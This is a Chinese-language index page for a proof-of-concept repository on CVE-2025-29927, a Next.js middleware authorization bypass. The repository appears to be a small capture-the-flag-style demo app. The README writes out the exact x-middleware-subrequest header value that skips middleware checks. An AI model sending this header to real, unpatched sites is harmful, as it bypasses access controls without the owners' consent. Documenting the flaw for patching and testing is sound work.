POC详情: 8f25d5d5023c30164533442caa05cf9d43c2e5f7

来源
https://github.com/0xcucumbersalad/cve-2025-29927
关联漏洞
标题: Next.js 安全漏洞 (CVE-2025-29927)
描述:Next.js是Vercel开源的一个 React 框架。 Next.js 14.2.25之前版本和15.2.3之前版本存在安全漏洞,该漏洞源于如果授权检查发生在中间件中,可能绕过授权检查。
介绍
### CVE-2025-29927

1. go to /api/flag
2. add `x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware` as header
3. see response
文件快照

 [4.0K]  /data/pocs/8f25d5d5023c30164533442caa05cf9d43c2e5f7
├── [  92]  next.config.mjs
├── [ 526]  package.json
├── [196K]  package-lock.json
├── [ 135]  postcss.config.mjs
├── [ 174]  README.md
├── [4.0K]  src
│   ├── [4.0K]  app
│   │   ├── [4.0K]  api
│   │   │   └── [4.0K]  flag
│   │   │       └── [ 159]  route.ts
│   │   ├── [ 25K]  favicon.ico
│   │   ├── [4.0K]  fonts
│   │   │   ├── [ 66K]  GeistMonoVF.woff
│   │   │   └── [ 65K]  GeistVF.woff
│   │   ├── [ 413]  globals.css
│   │   ├── [ 742]  layout.tsx
│   │   └── [ 274]  page.tsx
│   └── [ 353]  middleware.ts
├── [ 407]  tailwind.config.ts
└── [ 578]  tsconfig.json

5 directories, 15 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。